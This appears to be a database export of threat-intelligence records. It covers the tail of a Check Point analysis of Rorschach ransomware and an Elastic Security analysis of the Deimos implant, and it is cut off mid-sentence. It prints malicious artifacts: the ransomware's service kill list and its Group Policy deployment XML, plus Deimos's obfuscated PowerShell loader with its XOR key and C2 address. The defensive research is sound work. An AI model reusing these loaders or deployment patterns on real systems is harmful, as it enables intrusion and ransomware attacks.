manager.\nAcronisAgent\nAcrSch2Svc\nagntsvc.exe\nBackExecRPCService\nbackup\nBackupExecAgentAccelerator\nBackupExecDiveciMediaService\nBackupExecJobEngine\nbedbg\nCAARCUpdateSvc\nccEvtMgr\nCulserver\ndbeng50.exe\ndbeng8\ndbsnmp.exe\ndbsrv12.exe\nDefWatch\nencsvc.exe\nexcel.exe\nfirefox.exe\ninfopath.exe\nIntuit.QuickBooks.FCS\nisqlplussvc.exe\nmemtas\nmepocs\nmsaccess.exe\nMSExchange\nmsftesql-Exchange\nmsmdsrv\nmspub.exe\nMSSQL\nmydesktopqos.exe\nmydesktopservice.exe\nocautoupds.exe\nocomm.exe\nocssd.exe\nonenote.exe\noracle.exe\noutlook.exe\nPDVFSService\npowerpnt.exe\nQBCFMonitorService\nQBFCService\nQBIDPService\nSavRoam\nsophos\nsqbcoreservice.exe\nsql.exe\nsqladhlp\nSQLADHLP\nsqlagent\nSQLAgent\nSQLAgent$SHAREPOINT\nSQLBrowser\nSQLWriter\nsteam.exe\nsynctime.exe\ntbirdconfig.exe\nthebat.exe\nthunderbird.exe\ntomcat6\nveeam\nVeeamDeploymentService\nVeeamNFSSvc\nVeeamTransportSvc\nvisio.exe\nvmware-converter\nvmware-usbarbitator64\nWinSAT.exe\nwinword.exe\nwordpad.exe\nwrapper.exe\nWSBExchange\nxfssvccon.exe\nYooBackup\nAppendix C – Group Policies executed by Rorschach\nTransferring its own files to each workstation:\n<Files clsid=\"{215B2E53-57CE-475c-80FE-9EEC14635851}\">\n    <File clsid=\"{50BE44C8-567A-4ed1-B1D0-9234FE1F38AF}\" name=\"0305_winutils.dll\" status=\"0305_winutils.dll\" image=\"2\" changed=\"2023-03-05 08:51:22\" uid=\"{3F490769-A341-4220-90A3-51964B4A0C12}\" bypassErrors=\"1\">\n        <Properties action=\"U\" fromPath=\"\\\\**REDACTED**\\sysvol\\**REDACTED**.local\\scripts\\winutils.dll\" targetPath=\"%Public%\\winutils.dll\" readOnly=\"0\" archive=\"1\" hidden=\"0\" suppress=\"0\" />\n    </File>\n    <File clsid=\"{50BE44C8-567A-4ed1-B1D0-9234FE1F38AF}\" name=\"0305_config.ini\" status=\"0305_config.ini\" image=\"2\" changed=\"2023-03-05 08:51:22\" uid=\"{F513F283-3C66-4C71-9B9B-4CE9BBFCEEF1}\" bypassErrors=\"1\"\n        <Properties action=\"U\" fromPath=\"\\\\**REDACTED**.local\\sysvol\\**REDACTED**.local\\scripts\\config.ini\" targetPath=\"%Public%\\config.ini\" readOnly=\"0\" archive=\"1\" hidden=\"0\" suppress=\"0\" />\n    </File>\n    <File clsid=\"{50BE44C8-567A-4ed1-B1D0-9234FE1F38AF}\" name=\"0305_cy.exe\" status=\"0305_cy.exe\" image=\"2\" changed=\"2023-03-05 08:51:22\" uid=\"{0A16D469-2648-4849-99C8-95D1B777D59A}\" bypassErrors=\"1\">\n        <Properties action=\"U\" fromPath=\"\\\\**REDACTED**.local\\sysvol\\**REDACTED**.local\\scripts\\cy.exe\" targetPath=\"%Public%\\cy.exe\" readOnly=\"0\" archive=\"1\" hidden=\"0\" suppress=\"0\" />\n    </File>\n</Files>\nExecuting a scheduled task to run the attack:\n<TaskV2 clsid=\"{D8896631-B747-47a7-84A6-C155337F3BC8}\" name=\"2_0305_cy.exe\" image=\"2\" changed=\"**REDACTED**\" uid=\"{3772E17D-6354-4DF1-A73B-8868AC352B23}\">\n    <Properties action=\"U\" name=\"2_0305_cy.exe\" runAs=\"%LogonDomain%\\%LogonUser%\" logonType=\"InteractiveToken\">\n        <Task version=\"1.2\">\n            <RegistrationInfo>\n                <Author>**REDACTED**\\Administrador</Author>\n                <Description></Description>\n            </RegistrationInfo>\n            <Principals>\n                <Principal id=\"Author\">\n                    <UserId>%LogonDomain%\\%LogonUser%</UserId>\n                    <LogonType>InteractiveToken</LogonType>\n                    <RunLevel>HighestAvailable</RunLevel>\n                </Principal>\n            </Principals>\n            <Settings>\n                <IdleSettings>\n                    <Duration>PT10M</Duration>\n                    <WaitTimeout>PT1H</WaitTimeout>\n                    <StopOnIdleEnd>false</StopOnIdleEnd>\n                    <RestartOnIdle>false</RestartOnIdle>\n                </IdleSettings>\n                <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>\n                <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\n                <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\n                <AllowHardTerminate>true</AllowHardTerminate>\n                <AllowStartOnDemand>true</AllowStartOnDemand>\n                <Enabled>true</Enabled>\n                <Hidden>false</Hidden>\n                <ExecutionTimeLimit>P3D</ExecutionTimeLimit>\n                <Priority>7</Priority>\n            </Settings>\n            <Triggers>\n                <RegistrationTrigger>\n                    <Enabled>true</Enabled>\n                </RegistrationTrigger>\n                <LogonTrigger>\n                    <Enabled>true</Enabled>\n                </LogonTrigger>\n            </Triggers>\n            <Actions Context=\"Author\">\n                <Exec>\n                    <Command>%Public%\\cy.exe</Command>\n                    <Arguments>--run=**REDACTED**</Arguments>\n                </Exec>\n            </Actions>\n        </Task>\n    </Properties>\n</TaskV2>\nGO UP\nBACK TO ALL POSTS\nPOPULAR POSTS\nARTIFICIAL INTELLIGENCE\nCHATGPT\nCHECK POINT RESEARCH PUBLICATIONS\nOPWNAI : Cybercriminals Starting to Use ChatGPT\nARTIFICIAL INTELLIGENCE\nCHATGPT\nCHECK POINT RESEARCH PUBLICATIONS\nOpwnAI: AI That Can Save the Day or HACK it Away\nCHECK POINT RESEARCH PUBLICATIONS\nTHREAT RESEARCH\nBlindEagle Targeting Ecuador With Sharpened Tools\nBLOGS AND PUBLICATIONS\nJanuary 11, 2018\n‘RUBYMINER’ CRYPTOMINER AFFECTS 30% OF WW NETWORKS\nCHECK POINT RESEARCH PUBLICATIONS\nGLOBAL CYBER ATTACK REPORTS\nTHREAT RESEARCH\nFebruary 17, 2020\n“THE TURKISH RAT” EVOLVED ADWIND IN A MASSIVE ONGOING PHISHING CAMPAIGN\nAugust 11, 2017\n“THE NEXT WANNACRY” VULNERABILITY IS HERE\n123\nLet’s get in touch\nSubscribe for cpr blogs, news and more\nSubscribe Now\n© 1994-2023 Check Point Software Technologies LTD. All rights reserved.\nProperty of CheckPoint.com\nPrivacy Policy\n—Please choose an option—\nChina\nIndia\nUnited States\nIndonesia\nBrazil\nPakistan\nNigeria\nBangladesh\nRussia\nJapan\nMexico\nPhilippines\nVietnam\nEthiopia\nEgypt\nGermany\nIran\nTurkey\nDemocratic Republic of the Congo\nThailand\nFrance\nUnited Kingdom\nItaly\nBurma\nSouth Africa\nSouth Korea\nColombia\nSpain\nUkraine\nTanzania\nKenya\nArgentina\nAlgeria\nPoland\nSudan\nUganda\nCanada\nIraq\nMorocco\nPeru\nUzbekistan\nSaudi Arabia\nMalaysia\nVenezuela\nNepal\nAfghanistan\nYemen\nNorth Korea\nGhana\nMozambique\nTaiwan\nAustralia\nIvory Coast\nSyria\nMadagascar\nAngola\nCameroon\nSri Lanka\nRomania\nBurkina Faso\nNiger\nKazakhstan\nNetherlands\nChile\nMalawi\nEcuador\nGuatemala\nMali\nCambodia\nSenegal\nZambia\nZimbabwe\nChad\nSouth Sudan\nBelgium\nCuba\nTunisia\nGuinea\nGreece\nPortugal\nRwanda\nCzech Republic\nSomalia\nHaiti\nBenin\nBurundi\nBolivia\nHungary\nSweden\nBelarus\nDominican Republic\nAzerbaijan\nHonduras\nAustria\nUnited Arab Emirates\nIsrael\nSwitzerland\nTajikistan\nBulgaria\nHong Kong (China)\nSerbia\nPapua New Guinea\nParaguay\nLaos\nJordan\nEl Salvador\nEritrea\nLibya\nTogo\nSierra Leone\nNicaragua\nKyrgyzstan\nDenmark\nFinland\nSlovakia\nSingapore\nTurkmenistan\nNorway\nLebanon\nCosta Rica\nCentral African Republic\nIreland\nGeorgia\nNew Zealand\nRepublic of the Congo\nPalestine\nLiberia\nCroatia\nOman\nBosnia and Herzegovina\nPuerto Rico\nKuwait\nMoldov\nMauritania\nPanama\nUruguay\nArmenia\nLithuania\nAlbania\nMongolia\nJamaica\nNamibia\nLesotho\nQatar\nMacedonia\nSlovenia\nBotswana\nLatvia\nGambia\nKosovo\nGuinea-Bissau\nGabon\nEquatorial Guinea\nTrinidad and Tobago\nEstonia\nMauritius\nSwaziland\nBahrain\nTimor-Leste\nDjibouti\nCyprus\nFiji\nReunion (France)\nGuyana\nComoros\nBhutan\nMontenegro\nMacau (China)\nSolomon Islands\nWestern Sahara\nLuxembourg\nSuriname\nCape Verde\nMalta\nGuadeloupe (France)\nMartinique (France)\nBrunei\nBahamas\nIceland\nMaldives\nBelize\nBarbados\nFrench Polynesia (France)\nVanuatu\nNew Caledonia (France)\nFrench Guiana (France)\nMayotte (France)\nSamoa\nSao Tom and Principe\nSaint Lucia\nGuam (USA)\nCuracao (Netherlands)\nSaint Vincent and the Grenadines\nKiribati\nUnited States Virgin Islands (USA)\nGrenada\nTonga\nAruba (Netherlands)\nFederated States of Micronesia\nJersey (UK)\nSeychelles\nAntigua and Barbuda\nIsle of Man (UK)\nAndorra\nDominica\nBermuda (UK)\nGuernsey (UK)\nGreenland (Denmark)\nMarshall Islands\nAmerican Samoa (USA)\nCayman Islands (UK)\nSaint Kitts and Nevis\nNorthern Mariana Islands (USA)\nFaroe Islands (Denmark)\nSint Maarten (Netherlands)\nSaint Martin (France)\nLiechtenstein\nMonaco\nSan Marino\nTurks and Caicos Islands (UK)\nGibraltar (UK)\nBritish Virgin Islands (UK)\nAland Islands (Finland)\nCaribbean Netherlands (Netherlands)\nPalau\nCook Islands (NZ)\nAnguilla (UK)\nWallis and Futuna (France)\nTuvalu\nNauru\nSaint Barthelemy (France)\nSaint Pierre and Miquelon (France)\nMontserrat (UK)\nSaint Helena, Ascension and Tristan da Cunha (UK)\nSvalbard and Jan Mayen (Norway)\nFalkland Islands (UK)\nNorfolk Island (Australia)\nChristmas Island (Australia)\nNiue (NZ)\nTokelau (NZ)\nVatican City\nCocos (Keeling) Islands (Australia)\nPitcairn Islands (UK)\nThis website uses cookies in order to optimize your user experience as well as for advertising and analytics.  For further information, please read our Privacy Policy and ourCookie Notice.\nDISMISS\nManage Preferences",
  "status": "FAILED TO ANALYZE",
  "report_type": "WEBSITE",
  "added_on": {
    "$date": "2023-09-22T20:10:57.996Z"
  },
  "added_by": "OJgths0OqlZjyBr3ghJtTpFhxPf2",
  "updated_by": "OJgths0OqlZjyBr3ghJtTpFhxPf2",
  "updated_on": {
    "$date": "2023-09-22T20:26:04.834Z"
  },
  "gcloud_request": null,
  "message": "Traceback (most recent call last):\n  File \"/workspace/services/openai.py\", line 49, in _chat_completion\n    responses = ChatCompletion.create(model=self.model, messages=self.messages, temperature=0,\n                ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n  File \"/layers/google.python.pip/pip/lib/python3.11/site-packages/openai/api_resources/chat_completion.py\", line 25, in create\n    return super().create(*args, **kwargs)\n           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n  File \"/layers/google.python.pip/pip/lib/python3.11/site-packages/openai/api_resources/abstract/engine_api_resource.py\", line 153, in create\n    response, _, api_key = requestor.request(\n                           ^^^^^^^^^^^^^^^^^^\n  File \"/layers/google.python.pip/pip/lib/python3.11/site-packages/openai/api_requestor.py\", line 298, in request\n    resp, got_stream = self._interpret_response(result, stream)\n                       ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n  File \"/layers/google.python.pip/pip/lib/python3.11/site-packages/openai/api_requestor.py\", line 700, in _interpret_response\n    self._interpret_response_line(\n  File \"/layers/google.python.pip/pip/lib/python3.11/site-packages/openai/api_requestor.py\", line 765, in _interpret_response_line\n    raise self.handle_error_response(\nopenai.error.RateLimitError: Rate limit reached for default-gpt-4 in organization org-9Y6rql2RDohy1ntpUNuwl9IG on tokens per min. Limit: 40000 / min. Please try again in 1ms. Contact us through our help center at help.openai.com if you continue to have issues.\n\nDuring handling of the above exception, another exception occurred:\n\nTraceback (most recent call last):\n  File \"/workspace/services/threat_analysis/threat_analysis_orchestrator.py\", line 172, in __generate_openAI_analysis\n    response = chat_completion_feature_extractor.extract_features()\n               ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n  File \"/workspace/services/threat_analysis/chat_completion_feature_extractor.py\", line 35, in extract_features\n    responses = self._generate_responses(prompt1)\n                ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n  File \"/workspace/services/threat_analysis/chat_completion_feature_extractor.py\", line 84, in _generate_responses\n    responses = self._chat_completion()\n                ^^^^^^^^^^^^^^^^^^^^^^^\n  File \"/workspace/services/openai.py\", line 54, in _chat_completion\n    raise ConnectionError(e)\nConnectionError: Rate limit reached for default-gpt-4 in organization org-9Y6rql2RDohy1ntpUNuwl9IG on tokens per min. Limit: 40000 / min. Please try again in 1ms. Contact us through our help center at help.openai.com if you continue to have issues.\n"
},
{
  "_id": {
    "$oid": "6511c1eaa0cc2d726eb80398"
  },
  "name": "Deimos",
  "file_type": "application/pdf",
  "website_url": "",
  "website_title": null,
  "file_name": "Deimos.pdf",
  "file_size": "104 KB",
  "content": "The Deimos implant is a new, complex form of malware rst reported in 2020.\nThis remote access tool is under active development, with the aim of evading\ndetection by using multiple layers of complex obfuscation and encryption\ntechniques.\n\nThese advanced defensive countermeasures, which also include convincing lure\nles and digitally signed installation executables, can frustrate identication and\nanalysis. However, the Elastic Security team recently completed a successful\ntakedown of the observed command and control (C2) infrastructure, allowing us\nto provide detection rules and hunting techniques to aid in identifying this\npowerful implant.\n\nThis post details the tactics, techniques, and procedures, or TTPs, of the Deimos\nimplant. Our goal is to help security practitioners leverage the Elastic Stack to\ncollect and analyze malware and intrusion data by revealing information about\nhow Deimos works that its creators have attempted to obscure for defensive\npurposes.\n\nOverview\n\nThe Elastic Intelligence & Analytics team tracks a new strain of the Deimos initial\naccess and persistence implant previously associated with the Jupyter\nInfostealer malware (tracked elsewhere as Yellow Cockatoo, and SolarMarker).\nThis implant has demonstrated a maturation of obfuscation techniques as a\nresult of published research. This indicates that the activity group is actively\nmodifying its codebase to evade detective countermeasures.\n\nThe sample we observed was not leveraged as an information stealer. It is an\nimplant that provides initial access, persistence, and C2 functions. This makes\n\n\fthe implant powerful in that it can be used to accomplish any tasks that require\nremote access. It is likely that these intrusions are the beginning of a\nconcentrated campaign against the victims or will be sold off in bulk for other\ncampaigns unassociated with the access collection.\n\nThe analysis will leverage David Bianco's Pyramid of Pain analytical model to\ndescribe the value of atomic indicators, artifacts, tool-markings, and TTPs to the\nmalware authors and how uncovering them can impact the eciency of the\nintrusion sets leveraging this implant. Additionally, we are providing some\nhost-based hunting techniques and detection rules that can be leveraged to\nidentify this implant and others that share similar artifacts and TTPs.\n\nDetails\n\nOn August 31, 2021, Elastic observed process injection telemetry that shared\ntechniques with the Jupyter Infostealer as reported by Morphisec, Binary\nDefense, and security researcher Squibydoo [1] [2] [3] [4] [5]. As we began\nanalysis and compared the samples we observed to prior research, we identied\na change in the way obfuscation was implemented. This change may be the\nresult of several factors, one of which is an attempt by the adversary to bypass or\notherwise evade existing defenses or malware analysis.\n\nNote: As previous versions of this malware have been thoroughly documented,\nwe will focus on newly observed capabilities and functionality.\n\nDuring dynamic analysis of the malware, we observed behavior similar to that\nwhich had been reported elsewhere - namely obfuscation using a litany of\nruntime-created variables (variables that are unique to each execution),\n\n\fdirectories, an XOR cipher, and Base64 encoded commands. Below, is an\nexample of the new obfuscation tactics employed by the malware author to\nhinder analysis. We'll discuss this in detail as we unpack the malware's\nexecution.\n\n\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -command\n\"$650326ac2b1100c4508b8a700b658ad7='C:\\Users\\user1\\d2e227be5d58955a\n8d12db18fca5d787\\a5fb52fc397f782c691961d23cf5e785\\4284a9859ab2184b0\n17070368b4a73cd\\89555a8780abdb39d3f1761918c40505\\83e4d9dd7a7735a5\n16696a49efcc2269\\d1c086bb3efeb05d8098a20b80fc3c1a\\650326ac2b1100c4\n508b8a700b658ad7';$1e3dadee7a4b45213f674cb23b07d4b0='hYaAOxeocQMP\nVtECUZFJwGHzKnmqITrlyuNiDRkpgdWbSsfjvLBX';$d6ffa847bb31b563e9b7b08a\nad22d447=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($6\n50326ac2b1100c4508b8a700b658ad7));remove-item\n$650326ac2b1100c4508b8a700b658ad7;for($i=0;$i -lt\n$d6ffa847bb31b563e9b7b08aad22d447.count;)\\{for($j=0;$j -lt\n$1e3dadee7a4b45213f674cb23b07d4b0.length;$j++)\\{$d6ffa847bb31b563e9b7\nb08aad22d447[$i]=$d6ffa847bb31b563e9b7b08aad22d447[$i] -bxor\n$1e3dadee7a4b45213f674cb23b07d4b0[$j];$i++;if($i -ge\n$d6ffa847bb31b563e9b7b08aad22d447.count)\\{$j=$1e3dadee7a4b45213f674c\nb23b07d4b0.length\\}\\}\\};$d6ffa847bb31b563e9b7b08aad22d447=[System.Text.\nEncoding]::UTF8.GetString($d6ffa847bb31b563e9b7b08aad22d447);iex\n$d6ffa847bb31b563e9b7b08aad22d447;\"\n\nFigure 1: PowerShell executed by malware installer\n\nThe sample we observed created a Base64-encoded le nested several\nsubdirectories deep in the %USERPROFILE% directory and referenced this le\nusing a runtime variable in the PowerShell script\n($650326ac2b1100c4508b8a700b658ad7 in our sample). Once this encoded le\nwas read by PowerShell, it is deleted as shown in Figure 2. Other published\nresearch observed the Base64 string within the PowerShell command which\nmade it visible during execution. This shows an adaptation of the obfuscation\n\n\ftechniques leveraged by the malware authors in response to reports published by\nsecurity researchers.\n\nFromBase64String([System.IO.File]::ReadAllText($650326ac2b1100c4508b8a70\n0b658ad7));remove-item $650326ac2b1100c4508b8a700b658ad7\n\nFigure 2: Base64 encoded le read and then deleted\n\nAdditionally, there was the inclusion of another variable\n($1e3dadee7a4b45213f674cb23b07d4b0 in our example) with a value of\nhYaAOxeocQMPVtECUZFJwGHzKnmqITrlyuNiDRkpgdWbSsfjvLBX. By\ndeobfuscating the PowerShell command, we determined that this value was the\nXOR key used to decrypt the value of the 650326ac2b1100c4508b8a700b658ad7\nle. Now that we had the location of the Base64 encoded le and the ability to\ndecrypt it, we needed to prevent it from being deleted.\n\nTo do this, we leveraged the FileDelete event conguration for Sysmon. By\ndefault, this creates a directory in the \"C:\\Sysmon\" directory and then places all\ndeleted les (named by the le MD5 + SHA256 hashes + 33 0's + extension) in\nthat folder. This directory is only available to the SYSTEM user. We used PSExec\nto access the folder (psexec -sid cmd). The le contained a single-line\nBase64-encoded string.\n\nAs we observed in the PowerShell above, the contents are protected using an\nXOR cipher, but a cipher we have the key for. Using the command-line tools\nbase64 and xortool, we're able to decode and decrypt the le:\n\n\fbase64\n\n-D - use the base64 program to decode\n\n-i - the input le to be decoded\n\n-o - the output le to save the decoded content\n\nxortool-xor\n\n-r - the XOR cipher key\n\n-f - the le that is XOR encrypted\n\n\\> - output the decrypted le\n\nbase64 -D -i 650326ac2b1100c4508b8a700b658ad7.encoded \\\n\n-o 650326ac2b1100c4508b8a700b658ad7.decoded\n\nxortool-xor -r hYaAOxeocQMPVtECUZFJwGHzKnmqITrlyuNiDRkpgdWbSsfjvLBX \\\n\n-f 650326ac2b1100c4508b8a700b658ad7.decoded \\\n\n\\> 650326ac2b1100c4508b8a700b658ad7.xor\n\nFigure 3: Decrypting the XOR'd Base64 encoded le\n\nThis resulted in another obfuscated le that started with an XOR'd\nBase64-encoded variable and ended with more PowerShell.\n\n\f$adab58383614f8be4ed9d27508c2b='FTDSclNHUTdlaXBxnKdZa9pUUW9iakpFG\nDBaelBHbE9mbTVZYlVFbWIxZ...\n\n...CReaTEShorTcuT($ENV:APpDATa+'\\m'+'IcR'+'OSO'+'Ft'+'\\w'+'Ind'+'OW'+'S\\'+'sT'\n+'ARt'+' ME\n\n'+'nU'+'\\pr'+'OGR'+'aMS\\'+'sT'+'ART'+'uP'+'\\a44f066dfa44db9fba953a982d48b.LN\nk');$a78b0ce650249ba927e4cf43d02e5.tARGETpaTh=$a079109a9a641e8b8628\n32e92c1c7+'\\'+$a7f0a120130474bdc120c5f\n\n13775a;$a78b0ce650249ba927e4cf43d02e5.WInDoWSTYLE=7;$a78b0ce65024\n9ba927e4cf43d02e5.sAvE();IEx $a54b6e0f7564f4ad0bf41a1875401;\n\nFigure 4: Final obfuscated le (truncated)\n\nFollowing the same process as before, we identied the XOR key (which may\nhave been trying to use an = sign to appear to look like it was Base64) and\ndecoded the le.\n\nXjBrPGQ7aipqcXYkbTQobjJEX0ZzPGlOfm5YbUEmb1dBazZ0RlpCa2hLQks8eXNx\nK3tsRHpZVmtmUU9mb31jaVVuMXUxUGk/e0tDa0QmXjA8U0ZAckhgNl5vX1deQ\nGBad2peTyZvVUByaSk2XlBJMTxAdEtnT0B3fnBJPCtfe2tvV0d7P3Y0V2BaeXQ9P\nmhtI3ZaVHc3I2tGcm5IRmlmUTV8bXpxXlg/cyo8XyFwXyt5QmwjOChQZ09aPXxq\naS1hfmxDK3U=\n\nFigure 5: XOR cipher key\n\n\fThis process yielded a .NET DLL le that creates an implant tracking ID and les\nused for persistence (more about the tracking ID is in the Analysis - Initial Access\nsection).\n\nadab58383614f8be4ed9d27508c2b: PE32 executable (DLL) (console) Intel\n80386 Mono/.Net assembly, for MS Windows\n\nFigure 6: .NET DLL le type\n\nThe DLL calls itself Mars.Deimos and correlates to previous research by\nMorphisec, Binary Defense, and security researcher Squibydoo [1] [2] [3] [4] [5].\nThe particular samples that we've observed utilize the .NET hardening tool\nDotfuscator CE 6.3.0 to hinder malware analysis.\n\nWhat we found particularly interesting is that the authors have spent time\nmodifying the malware in an attempt to make it harder to detect, indicating that\nthey're incentivized to maintain the malware. This is good to know as we move\ninto the analysis phase because it means that we can make an impact on a\nvaluable malware implant that will frustrate those using it for nancial gain.\n\nAnalysis\n\nAll indicators referenced in the analysis are located in the Indicators section.\n\nThe Pyramid of Pain\n\n\fBefore we get into the analysis, let's discuss the model we used to help guide our\nprocess.\n\nIn 2013, security researcher David Bianco released an analytical model called the\nPyramid of Pain. The model is intended to understand how uncovering different\nparts of an intrusion can impact a campaign. As you can see in the model below,\nidentifying hash values are useful, but easily changed by an adversary whereas\nidentifying TTPs is very dicult for an adversary to change.\n\nFigure 7: Pyramid of Pain\n\nThe goal of using the Pyramid of Pain is to understand as much about the\nintrusion as possible and project the impact (read: the amount of \"pain\") you can\ninict. Throughout the analysis of the observed samples, we'll overlay them onto\nthe Pyramid of Pain as an illustrative method to assess the potential impact.\n\nFile Hashes\n\nOnce we identied that we had observed a new variant of the malware sample,\nwe applied search queries to our dataset and identied 10 unique organizations\nacross multiple verticals, indicating that this did not appear to be targeted. From\nthose 10 organizations, we observed 10 different initial-installer le hashes. The\ndropped encoded les are also all different.\n\nSo while this information is useful, it is apparent that using a le hash as a\ndetection method would not be useful across organizations.\n\n\fIP Addresses\n\nAs other researchers have noted, we observed the same IP address used in the\ncampaign. This IP address was rst associated with malicious les on August\n30, 2021.\n\nIP 216.230.232.134\n\nAnycast false\n\nCity Houston\n\nRegion Texas\n\nCountry United States (US)\n\nLocation 29.7633,-95.3633\n\nOrganization AS40156 The Optimal Link Corporation\n\nPostal 77052\n\nTimezone America/Chicago\n\nFigure 8: Information on identied IP address\n\nThis IP address has been reported to multiple abuse sites and identied\nindependently by multiple security researchers. We initiated a successful\n\n\ftakedown request of the IP address on September 21, 2021, which has removed\nthe observed C2 infrastructure access to any implants.\n\nWhile this atomic indicator is useful for blocking on a rewall, it is trivial for an\nadversary to change to another IP address, so lets try to get higher up the\npyramid and make a bigger impact on the adversary.\n\nArtifacts\n\nResource Development\n\nThe lure le samples we analyzed were predominantly signed by organizations in\nScandinavian and Slavic-speaking countries, with two outliers from English and\nFrench-speaking countries. Multiple samples were signed with a digital\ncerticate registered as a \"Spolonos s Ruenm Obmedzenm\" (S.R.O.). An\nS.R.O. is a business designation for Slovakian businesses owned by a foreign\nentity.\n\nThe S.R.O. that we observed as owning the digital signatures (SRO #1) was\nformed on July 29, 2021, and the signature was observed starting on August 26,\n2021. Additionally, the S.R.O. that we observed is owned by a different S.R.O.\n(SRO #2).\n\nFile Hashes\n\nOnce we identied that we had observed a new variant of the malware sample,\nwe applied search queries to our dataset and identied 10 unique organizations\nacross multiple verticals, indicating that this did not appear to be targeted. From\n\n\fthose 10 organizations, we observed 10 different initial-installer le hashes. The\ndropped encoded les are also all different.\n\nSo while this information is useful, it is apparent that using a le hash as a\ndetection method would not be useful across organizations.\n\nIP Addresses\n\nAs other researchers have noted, we observed the same IP address used in the\ncampaign. This IP address was rst associated with malicious les on August\n30, 2021.\n\nIP 216.230.232.134\n\nAnycast false\n\nCity Houston\n\nRegion Texas\n\nCountry United States (US)\n\nLocation 29.7633,-95.3633\n\nOrganization AS40156 The Optimal Link Corporation\n\nPostal 77052\n\nTimezone America/Chicago\n\n\fFigure 8: Information on identied IP address\n\nThis IP address has been reported to multiple abuse sites and identied\nindependently by multiple security researchers. We initiated a successful\ntakedown request of the IP address on September 21, 2021, which has removed\nthe observed C2 infrastructure access to any implants.\n\nWhile this atomic indicator is useful for blocking on a rewall, it is trivial for an\nadversary to change to another IP address, so lets try to get higher up the\npyramid and make a bigger impact on the adversary.\n\nArtifacts\n\nRESOURCE DEVELOPMENT\n\nThe lure le samples we analyzed were predominantly signed by organizations in\nScandinavian and Slavic-speaking countries, with two outliers from English and\nFrench-speaking countries. Multiple samples were signed with a digital\ncerticate registered as a \"Spolonos s Ruenm Obmedzenm\" (S.R.O.). An\nS.R.O. is a business designation for Slovakian businesses owned by a foreign\nentity.\n\nThe S.R.O. that we observed as owning the digital signatures (SRO #1) was\nformed on July 29, 2021, and the signature was observed starting on August 26,\n2021. Additionally, the S.R.O. that we observed is owned by a different S.R.O.\n(SRO #2).\n\n\fFigure 9: Lure le digital signing S.R.O. (SRO #1) and owner (SRO #2)\n\nSRO #2 has been in business since August 19, 2014, and provides a variety of\nservices. The owner of SRO #2 has a single-named partner located in a country in\nthe former Eastern Bloc of Europe (Executive manager).\n\nFigure 10: SRO #2 and SRO #1 sharing the same executive manager\n\nWe are unable to state denitively if the organizations or people are intentionally\ninvolved, cutouts, or unwilling participants so we will not be naming them. This\nprocess of obtaining possibly stolen certicates aligns with other samples we\nanalyzed. It is obvious that however these certicates were procured, the person\n(or persons) responsible appear well-versed with the bureaucracies and laws\nrequired in registering a foreign-owned business in Slovakia.\n\nInitial Access\n\nWe observed the most indicators in this tier. Indicators in the Artifacts tier, both\nhost and network, are valuable to a defender because they are dicult for an\nadversary to change without considerable rearchitecting of the way the malware\nfunctions. This differs from atomic indicators (hashes and infrastructure) in that\nthose elements are modular and can simply be updated. Artifacts, like cipher\nkeys (as we'll see below), are often hard-coded into the source code prior to\ncompilation and require signicant work to adjust.\n\n\fThe dropper creates a series of nested directories whose names are\n32-characters long, alphanumeric, and lowercase. In all cases we've observed,\nthere are six nested directories, and a single le within the nal subdirectory\nusing the same naming convention. During the initial execution, this le is loaded,\ndeobfuscated with a 52-byte static XOR key, and then executed as a PowerShell\nscript. We have included a hunting query in the Detection section that identies\nthis activity.\n\nAdditionally, the .Net assembly creates a string by listing all les located at\n%USERPROFILE%\\APPDATA\\ROAMING. This is stored as the hwid value, which is\na unique identier for this machine. If the le doesn't exist yet, it is created by\ngenerating 32 random bytes and encoding them with a custom Base64 encoding.\n\nPersistence\n\nOnce executed, the PowerShell script establishes persistence of the malware\ngenerating a random quantity between 100 and 200 les in a directory named\n%APPDATA%\\Microsoft\\<random string>. The random string contains only\nlowercase and uppercase letters A-Z and the digits 0-9. It could be anywhere\nbetween 10 to 20 characters in length. This directory is the staging directory.\nThese les contain randomly generated bytes between 50,000 bytes and 200,000\nbytes. The les themselves are named <random string>.<random string>, where\neach random string follows the same convention as the directory name. Lastly,\none nal le is written to this directory which contains an obfuscated .Net DLL.\nThis is the actual Deimos implant. It resembles the dummy les with similar\nattributes in this directory, further attempting to evade defenses.\n\nThe next function script will create two registry keys that provide a Windows shell\nhandler for the rst le of random data created above. It uses the le extension\nof that le to associate a request to execute it with running a PowerShell\ncommand. The registry keys are created at\n\n\fHKEY\\_CURRENT\\_USER\\Software\\Classes\\<random string>\\, where the random\nstring follows the same convention as mentioned above, except for all lowercase\ncharacters. The rst key will further have a subkey of \\Shell\\Open\\Command that\ncontains the loader PowerShell script. The string value itself has mixed cases in\nan effort to be more dicult to search for. For example PowErShELl was used in\nour sample. The second key is effectively an alias that matches the le extension\nof the rst randomly generated le above. It's value matches the lowercase value\nof the random string used in the rst key's path.\n\nThe nal persistence artifact is a .LNk le that is placed in the user's StartUp\ndirectory. In this sample, it is hard-coded to be named\na44f066dfa44db9fba953a982d48b.LNk. The shortcut is set to launch the rst\nrandomly generated le above and will open in a minimized window. Upon user\nlogin, the link le will tell Windows to launch the le, but it isn't executable. The\nregistry keys above tell Windows to launch the PowerShell command congured\nin the rst key above to execute the le. The PowerShell command contains the\nfull path to the obfuscated .Net DLL and the XOR key to deobfuscate it. Finally,\nthe .Net DLL assembly will be executed by PowerShell by calling the class\nmethod [Mars.Deimos]::interact(). This persistence architecture can be dicult to\nfollow in text, so below is a visual representation of the persistence mechanism.\n\nFigure 11: Persistence mechanism ow\n\nCommand and Control Phase\n\nThe malware provides a general-purpose implant that can perform any action at\nits privilege level. Namely, it can receive and execute a Windows PE le, a\nPowerShell script, a .Net DLL assembly, or run arbitrary PowerShell commands.\n\n\fThere are a few command-specic permutations of payload encapsulations, but\nthey are passed to a common method to perform the web request to the 